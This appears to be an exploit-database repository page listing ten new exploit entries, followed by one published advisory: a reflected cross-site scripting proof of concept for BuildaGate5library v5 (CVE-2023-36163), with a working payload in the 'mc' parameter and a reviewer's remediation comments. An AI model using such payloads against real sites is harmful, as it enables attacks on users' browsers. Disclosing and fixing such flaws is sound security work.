
10 changes to exploits/shellcodes/ghdb

Ateme TITAN File 3.9 - SSRF File Enumeration
Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
Spring Cloud 3.2.2 - Remote Command Execution (RCE)
BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
Park Ticketing Management System 1.0 - 'viewid' SQL Injection
Park Ticketing Management System 1.0 - 'viewid' SQL Injection
Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)
AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_
Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_
MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_
16 lines
No EOL
565 B
Text
# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163
#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa
After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa |
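
Review bot: the text under #PoC never states where the mc value is reflected in the page, which is the detail a maintainer needs in order to fix it. The leading '> in the payload suggests the value is written unencoded inside a single-quoted HTML attribute; say so explicitly and name the remediation (encode mc for the attribute context, single and double quotes included, before writing it into the response). The inline example and the #Payload line also use different filler around the same script tag (aa versus aaa/aaaa), so one string used in both places would remove the ambiguity. "Vendor Homepage: None" leaves readers no way to identify affected deployments; a software link, or a note that none exists, would help.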